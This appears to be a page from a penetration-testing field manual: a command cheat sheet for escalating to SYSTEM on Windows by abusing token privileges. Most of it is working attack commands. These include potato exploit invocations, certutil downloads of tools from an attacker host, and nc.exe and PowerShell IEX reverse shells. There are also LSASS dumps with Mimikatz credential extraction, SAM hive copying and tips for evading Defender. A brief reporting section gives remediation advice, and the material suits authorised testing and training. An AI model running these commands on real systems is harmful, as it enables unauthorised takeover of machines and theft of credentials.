Field Manual

Windows PrivEsc Token Privileges

4 min read

πŸ›‘οΈ Methodology Checklist

  • Check privileges: whoami /priv
  • SeImpersonatePrivilege β†’ OS build ≀1809: JuicyPotato; β‰₯1809: PrintSpoofer
  • SeDebugPrivilege β†’ LSASS dump via procdump or comsvcs.dll
  • SeTakeOwnershipPrivilege β†’ takeown /f [file] then icacls [file] /grant [USER]:F
  • SeBackupPrivilege β†’ backup SAM/SYSTEM or NTDS via diskshadow
  • SeAssignPrimaryToken β†’ PrintSpoofer or GodPotato
  • PPID spoofing with psgetsystem if needed for stealth

🎯 Operational Context

Use when: whoami /priv shows SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege β€” use potato exploits (PrintSpoofer, RoguePotato, GodPotato) for SYSTEM. Think Dumber First: whoami /priv β†’ if SeImpersonatePrivilege = Enabled, run PrintSpoofer64.exe -i -c cmd immediately. This converts IIS/SQL service account access to SYSTEM in one command. Skip when: SeImpersonate is Disabled β€” token not active; try token manipulation via AdjustTokenPrivileges to enable it first.

⚑ Tactical Cheatsheet

CommandTactical Outcome
whoami /privConfirm enabled token privileges
.\JuicyPotato.exe -l 1337 -p cmd.exe -a "/c [CMD]" -t *SeImpersonate β†’ SYSTEM (Server 2016 / build ≀1809)
.\PrintSpoofer.exe -c "cmd.exe /c [CMD]"SeImpersonate β†’ SYSTEM (Server 2019 / build β‰₯1809)
.\PrintSpoofer.exe -i -c powershell.exeInteractive SYSTEM PowerShell via PrintSpoofer
.\RoguePotato.exe -r [LHOST] -e "cmd.exe /c [CMD]" -l 9999SeImpersonate β†’ SYSTEM (alternative to JuicyPotato)
.\procdump.exe -accepteula -ma lsass.exe lsass.dmpSeDebugPrivilege β†’ dump LSASS to file
sekurlsa::minidump lsass.dmpLoad LSASS dump in Mimikatz
sekurlsa::logonpasswordsExtract credentials from LSASS dump
.\psgetsystem.ps1; Get-SystemPPID spoofing to spawn SYSTEM process (SeDebugPrivilege)
.\EnableAllTokenPrivs.ps1Enable all token privileges including SeTakeOwnership
takeown /f C:\[PROTECTED_FILE]SeTakeOwnership β†’ take file ownership
icacls C:\[PROTECTED_FILE] /grant [USER]:FGrant yourself full control after takeown
type C:\[PROTECTED_FILE]Read previously protected file

πŸ”¬ Deep Dive & Workflow

SeImpersonatePrivilege β€” OS Build Decision Tree

Check build: systeminfo | findstr "OS Version"

Build ≀ 1809 (Server 2016, Win10 1809):
  β†’ JuicyPotato.exe
  β†’ Must select correct CLSID for the OS version
  β†’ https://github.com/ohpe/juicy-potato/tree/master/CLSID

Build β‰₯ 1809 (Server 2019+, Win10 1809+):
  β†’ PrintSpoofer.exe (uses named pipe impersonation)
  β†’ or RoguePotato (DCOM + OXID resolver)
  β†’ or GodPotato (works on most modern versions)

Common trigger context:
  β†’ IIS service account (IIS AppPool\DefaultAppPool) β†’ has SeImpersonate
  β†’ MSSQL service account β†’ xp_cmdshell β†’ whoami β†’ check privs
  β†’ Any Windows service account

JuicyPotato Execution

# Transfer JuicyPotato and nc.exe
certutil -urlcache -split -f http://[LHOST]/JuicyPotato.exe C:\tools\jp.exe
certutil -urlcache -split -f http://[LHOST]/nc.exe C:\tools\nc.exe
 
# Reverse shell via JuicyPotato
C:\tools\jp.exe -l 1337 -p C:\Windows\System32\cmd.exe -a "/c C:\tools\nc.exe [LHOST] [LPORT] -e cmd.exe" -t *
 
# If CLSID fails, specify for OS version:
# Server 2016: {4991D34B-80A1-4291-83B6-3328366B9097}
C:\tools\jp.exe -l 1337 -p cmd.exe -a "/c nc.exe [LHOST] [LPORT] -e cmd.exe" -t * -c {4991D34B-80A1-4291-83B6-3328366B9097}

PrintSpoofer Execution

# Interactive shell
.\PrintSpoofer.exe -i -c "cmd.exe"
 
# Reverse shell
.\PrintSpoofer.exe -c "nc.exe [LHOST] [LPORT] -e cmd.exe"
 
# PowerShell reverse shell
.\PrintSpoofer.exe -c "powershell.exe -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://[LHOST]/shell.ps1')"

SeDebugPrivilege β€” LSASS Dump β†’ Credentials

# Method 1: ProcDump (signed MS tool β€” less AV flagging)
.\procdump.exe -accepteula -ma lsass.exe C:\temp\lsass.dmp
 
# Method 2: Task Manager (GUI) β€” right-click lsass.exe β†’ Create Dump File
 
# Method 3: PowerShell + MiniDump API
# (various PoCs available β€” flag "Out-Minidump" or "Invoke-Mimikatz")
 
# Method 4: comsvcs.dll (LOLBin β€” already on system)
rundll32.exe C:\windows\system32\comsvcs.dll MiniDump [LSASS_PID] C:\temp\lsass.dmp full
 
# Transfer dump to attacker
# Analyze with Mimikatz offline:
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonpasswords

PPID Spoofing with psgetsystem

# SeDebugPrivilege allows process injection into SYSTEM processes
Import-Module .\psgetsystem.ps1
Get-System
# β†’ Spawns cmd.exe as SYSTEM via PPID spoofing (parent = winlogon.exe)
 
# Verify:
whoami   # β†’ nt authority\system

SeTakeOwnershipPrivilege β€” Protected File Access

# Enable privilege (may be listed but disabled)
.\EnableAllTokenPrivs.ps1
 
# Typical target: SAM, SYSTEM, NTDS.dit, or any protected config
# Example β€” access another user's files
takeown /f "C:\Users\Administrator\Desktop\secret.txt"
icacls "C:\Users\Administrator\Desktop\secret.txt" /grant [CURRENT_USER]:F
type "C:\Users\Administrator\Desktop\secret.txt"
 
# Access SAM and SYSTEM registry hives (for offline hash extraction)
takeown /f C:\Windows\System32\config\SAM
icacls C:\Windows\System32\config\SAM /grant [USER]:F
copy C:\Windows\System32\config\SAM C:\temp\
copy C:\Windows\System32\config\SYSTEM C:\temp\
# β†’ impacket-secretsdump -sam SAM -system SYSTEM LOCAL

πŸ› οΈ Troubleshooting & Edge Cases

ProblemCauseFix
PrintSpoofer failsWindows Server 2019+ with Print Spooler disabledTry GodPotato instead: works on all Windows 10/2016/2019/2022
RoguePotato failsNetwork not accessible for OXID resolutionPrintSpoofer or GodPotato don’t require network; use them instead
GodPotato returns errorWrong .NET version on targetGodPotato requires .NET 4.0+; check: dir C:\Windows\Microsoft.NET\Framework64\
Potato exploit runs but returns error 5SeImpersonatePrivilege not enabledEnable: whoami /priv check; some tokens need activation via PowerShell token manipulation
SweetPotato failsWindows Defender detectingUse GodPotato or PrintSpoofer β€” less detected; or compile from source with modified strings

πŸ“ Reporting Trigger

Finding Title: SeImpersonatePrivilege Exploited for SYSTEM Privilege Escalation Impact: Service accounts with SeImpersonatePrivilege (IIS, MSSQL, etc.) are exploitable via potato-class attacks to impersonate the SYSTEM token, escalating from service account to full SYSTEM access without additional vulnerability exploitation. Root Cause: IIS application pool or SQL Server service running with SeImpersonatePrivilege (granted by default to service accounts). Modern Windows token isolation not preventing potato exploit class. Recommendation: Run IIS and SQL Server service accounts without SeImpersonatePrivilege where possible. Apply Windows patches for PrintSpoofer CVEs. Consider Windows Defender Application Control (WDAC) to block potato exploit binaries. Monitor for SYSTEM token impersonation attempts via EDR.

πŸ”— Related Nodes

Graph View

Backlinks